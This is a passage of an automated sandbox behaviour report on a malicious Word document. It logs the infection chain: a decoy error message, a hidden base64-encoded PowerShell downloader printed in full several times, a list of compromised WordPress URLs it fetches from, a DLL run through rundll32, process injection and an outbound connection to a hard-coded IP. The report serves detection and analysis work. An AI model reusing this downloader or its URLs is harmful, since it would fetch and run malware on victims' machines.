HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe

Network Connect: 5.2.136.90 80

Jump to behavior

Encrypted powershell cmdline option found

Source: unknown	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded sV ("K"+"47d") ([tYPe]("{4}{1}{0}{3}{2}"-F's','y','ecTorY','TEm.Io.DIr','s')) ; $Wi8 =[tyPe]("{2}{3}{7}{1}{4}{6}{5}{8}{0}"-F 'gER','.Net.SERV','SYs','Te','I','tmA','CePOIN','m','Na') ; $ErrorActionPreference = (('Silent'+'ly')+'C'+('on'+'ti')+'n'+'ue');$Ol9onki=$C02W + [char](64) + $A03P;$H27X=('I'+('6'+'7Q')); (gi ("VaR"+"iABLe:k"+"47d") ).vaLue::"CrE`A`T`EDIReCT`ORy"($HOME + (('{'+'0'+'}Ns'+'p'+'zvsg{'+'0}'+'Sj_dwgs{'+'0}') -f [CHAR]92));$T48K=('H'+('61'+'D')); $Wi8::"secuRit`yprO`T`ocoL" = (('Tl'+'s')+'12');$C59M=(('M'+'24')+'P');$Xmmhked = (('R'+'31')+'N');$A69I=(('P_'+'6')+'B');$Q2yg9g_=$HOME+((('1'+'wr')+('Ns'+'pz')+('v'+'sg')+'1w'+('rS'+'j_'+'dw'+'gs1wr'))."rEp`lAce"(([Char]49+[Char]119+[Char]114),'\'))+$Xmmhked+(('.d'+'l')+'l');$U39R=('M0'+'1P');$Qcech4h=(']a'+('n'+'w[3://')+('w'+'ps')+'a'+'pk'+('.co'+'m/wp-'+'ad'+'mi')+('n/v'+'/@')+']'+('anw'+'[3'+'://s')+('ofsu'+'i')+'te'+('.c'+'o')+'m/'+'wp'+('-i'+'nc')+('lud'+'e')+'s/'+('2jm3n'+'Ik/'+'@')+(']a'+'nw[')+'3'+('://veter'+'inaria'+'d')+('rp'+'op')+('ui.co'+'m')+('/'+'co')+'n'+'te'+('nt'+'/5f')+'1'+'8Q'+'/'+'@'+(']a'+'n')+'w'+('[3:'+'//sh'+'op'+'.')+'el'+'e'+('men'+'sl'+'i')+('d'+'e.')+('com'+'/')+'wp'+'-c'+'o'+('n'+'tent')+('/'+'n/'+'@]an')+('w[3'+'://')+'k'+('h'+'an')+('h'+'ho')+('aho'+'m')+('nay.ne'+'t/'+'wordp')+('re'+'s')+('s/'+'C')+('GMC/@'+']')+'an'+'w'+('[3:/'+'/')+('ca'+'m')+('pu'+'se'+'xpo'+'.org/de')+'p'+('ar'+'tmen')+'t'+('-'+'of-odhm')+('mkd/95eX'+'Z'+'Y')+('/@]anw['+'3s://g'+'ur'+'zta'+'c			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Shuwftk\rwhokf.exo',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gfhmd\pcib.aey',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv',Control_RunDLL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji',Control_RunDLL	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK	Jump to behavior

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10004C5A cpuid

7_2_10004C5A

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
